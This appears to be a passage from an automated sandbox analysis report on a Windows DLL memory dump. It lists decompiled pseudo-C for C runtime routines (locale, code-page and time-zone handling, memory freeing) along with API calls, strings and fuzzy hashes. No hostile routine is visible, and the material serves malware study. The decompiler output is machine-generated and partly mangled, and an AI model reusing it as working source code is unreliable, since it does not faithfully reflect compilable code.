							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6DE2D5B2(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6DE12188();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x6de9506c; // 0xc4837075
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6DE1D5FF(_t89, _t100, _t116);
								_t122 =  *(E6DE1D5FF(_t90, _t100, _t116) + 0x34c);
								_t129 = E6DE2E4C7(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6DE2806D(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6DE2E5FB(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								_pop(_t130);
								__eflags = _v12 ^ _t132;
								return E6DDEF8A5(_v12 ^ _t132, _t116, _t130);
							} else {
								_t68 = E6DE24323(_t100, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E6DE24323(_t100, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6DE37BBB(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E6DE24323(_t112, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6DE37BBB(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E6DE35124(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,96574AD2), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,96574AD2), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6DE1E042,?,?,?,?,6DE1DA1E,?,00000004), ref: 6DE2DE78
_wcschr.LIBVCRUNTIME ref: 6DE2DF08
_wcschr.LIBVCRUNTIME ref: 6DE2DF16
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,Bm,00000000,?), ref: 6DE2DFB9

Strings

)mU, xrefs: 6DE2DDD4
t!mE, xrefs: 6DE2DE09
Bm, xrefs: 6DE2DE8F, 6DE2DED7, 6DE2DF7F

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: )mU$Bm$t!mE
API String ID: 4212172061-4093402219
Opcode ID: a8b7fce2440edd47fa963f4898941171e53fa054f4b0256480d0f60490f7f6fa
Instruction ID: fca5fd93ebc67425c94dae02697d5b0b382bef76f01ec8e2ddcbbe6c23e9e401
Opcode Fuzzy Hash: a8b7fce2440edd47fa963f4898941171e53fa054f4b0256480d0f60490f7f6fa
Instruction Fuzzy Hash: 06612939604207AAE7159B34CC85BBA73A8EF85718F22446EEB18D7280FF74E541C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2E518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6DE2E518(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x6de2e837
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6de42f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6de42f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6DE1BF09(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x6de2e837
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6DE2E837,?,00000000), ref: 6DE2E5B1
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6DE2E837,?,00000000), ref: 6DE2E5DA
GetACP.KERNEL32(?,?,6DE2E837,?,00000000), ref: 6DE2E5EF

Strings

OCP, xrefs: 6DE2E56C
7m, xrefs: 6DE2E5CF, 6DE2E5A6
ACP, xrefs: 6DE2E536

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: 7m$ACP$OCP
API String ID: 2299586839-3422903688
Opcode ID: 6bbc702f3003c0e1d601cf64c8805449166e677c000b6fd8fab3ed68d1e9a59d
Instruction ID: f0b70e353e2ab9763577518776d02c514cf4d3ba61bd457234b3c8c4f7c0a98b
Opcode Fuzzy Hash: 6bbc702f3003c0e1d601cf64c8805449166e677c000b6fd8fab3ed68d1e9a59d
Instruction Fuzzy Hash: 2221B5226E492696D7248F74C901BA777B6BF45F18B728424E905E7300FF32DD41C750

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2BF64, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE2BF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6de950b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6DE1CBD3(_t46);
							E6DE2C7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6DE1CBD3(_t47);
							E6DE2CCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6DE1CBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6DE1CBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6DE1CBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6DE1CBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6DE1CBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6DE1CBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6DE2C0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6de952b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6DE1CBD3(_t31);
							E6DE1CBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6DE1CBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6DE1CBD3(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 6DE2BFA8

Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C7EC
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C7FE
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C810
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C822
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C834
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C846
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C858
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C86A
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C87C
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C88E
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C8A0
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C8B2
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C8C4

_free.LIBCMT ref: 6DE2BF9D

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE2BFBF
_free.LIBCMT ref: 6DE2BFD4
_free.LIBCMT ref: 6DE2BFDF
_free.LIBCMT ref: 6DE2C001
_free.LIBCMT ref: 6DE2C014
_free.LIBCMT ref: 6DE2C022
_free.LIBCMT ref: 6DE2C02D
_free.LIBCMT ref: 6DE2C065
_free.LIBCMT ref: 6DE2C06C
_free.LIBCMT ref: 6DE2C089
_free.LIBCMT ref: 6DE2C0A1

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: d52aa74de3377c90392bc2e9f4b894d72393686db59f321cb1bb3421556c863d
Instruction ID: c258c08bf26d04b448ed377935d82c122569170a8f62c4328a88371dc3493123
Opcode Fuzzy Hash: d52aa74de3377c90392bc2e9f4b894d72393686db59f321cb1bb3421556c863d
Instruction Fuzzy Hash: 6D311B31B092069FEB219A35DC84FAAB3F9AF0075CF31482DE568E7651DF71E9908B50

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6DE2877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6DE2822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6DE28289( &_v8) != 0 || E6DE28231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6DE12188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6DE2822B();
					_t32 =  &_v52; // 0x6de42130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6DE28289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6DE12188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6de9506c; // 0xc4837075
						_v100 = _t74 ^ _t192;
						 *0x6de95384 =  *0x6de95384 | 0xffffffff;
						 *0x6de95378 =  *0x6de95378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6de97a10 = 0;
						_t78 = E6DE21216(0x6de42130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6de42130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6DE1F26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6DE21216(0x6de42130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6de42130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6DE1CBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6DE1CBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6DE2877C(0x6de42130, _t172, __eflags);
							}
						}
						E6DE1CBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6DDEF8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6DE28231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6DE2825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6DE1CBD3( *0x6de97a08);
								 *0x6de97a08 = 0;
								 *_t194 = 0x6de97a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6de97a18 * 0x3c;
									_t168 =  *0x6de97a6c; // 0x0
									_push(_t171);
									 *0x6de97a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6de97a5e; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6de97ab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6de97ac0; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6DE13CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6de97a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6de97a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6DE28225()) = _v12;
								 *((intOrPtr*)(E6DE28219())) = _v16;
								_t96 = E6DE2821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6de97a08; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6DE1CBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6de28b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6de28b6e
						 *0x6de97a08 = E6DE1F26D(_t154 - _t170, _t13);
						_t116 = E6DE1CBD3(0);
						_t167 =  *0x6de97a08; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6de28b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6de28b6e
							_t119 = E6DE1AB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6DE33B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6DE1BFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6DE1BFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6DE1BFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6DE28225()) = _v8;
										_t128 = E6DE28219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6DE33B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}

APIs

_free.LIBCMT ref: 6DE287FE
_free.LIBCMT ref: 6DE28822
_free.LIBCMT ref: 6DE289A9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6DE42130), ref: 6DE289BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6DE28A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A70,000000FF,?,0000003F,00000000,?), ref: 6DE28A60
_free.LIBCMT ref: 6DE28B75

Strings

0!m, xrefs: 6DE28964, 6DE2896A
0!m, xrefs: 6DE28AD8

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!m$0!m
API String ID: 314583886-1395855498
Opcode ID: 4e11c4f922a732d0ec69ecb65b5d45e87ef1c18f607e928d502d243553028e1a
Instruction ID: 6c0ac9293a12044febf22a318ea25a186f8d35227dc3de8f94cf8bdc56e01876
Opcode Fuzzy Hash: 4e11c4f922a732d0ec69ecb65b5d45e87ef1c18f607e928d502d243553028e1a
Instruction Fuzzy Hash: E7C11872A08646ABDB15DF68CCC0BBA7BB9EF42318F35459ED594AB340EF309A41C750

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1D3EF, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE1D3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6de40c10) {
					E6DE1CBD3(_t52);
					_t26 = _a4;
				}
				E6DE1CBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6DE1D23E(5,  &_v8);
				_v8 =  &_a4;
				return E6DE1D28E(4,  &_v8);
			}

APIs

_free.LIBCMT ref: 6DE1D403

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE1D40F
_free.LIBCMT ref: 6DE1D41A
_free.LIBCMT ref: 6DE1D425
_free.LIBCMT ref: 6DE1D430
_free.LIBCMT ref: 6DE1D43B
_free.LIBCMT ref: 6DE1D446
_free.LIBCMT ref: 6DE1D451
_free.LIBCMT ref: 6DE1D45C
_free.LIBCMT ref: 6DE1D46A

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 282e8f461a055616628fc03499b5de85ea263430c2ef734941c22ca926dc9e16
Instruction ID: d9edc1809316870a3ed422901aa4486066c6c3ea266e4efc7386ebba4b5d0681
Opcode Fuzzy Hash: 282e8f461a055616628fc03499b5de85ea263430c2ef734941c22ca926dc9e16
Instruction Fuzzy Hash: 8C11967574D10CAFCB01DF54CC41DEA7BB5EF0465CB2244A9BA08CF222DB75EA609B80

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDD777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t50 =  *0x6de96c10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6DDB161C(0x6de96b2c);
				_t38 = _a8;
				_t20 = E6DDB171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDD7E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6DDB1438(_t42);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t48);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6de96c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}

APIs

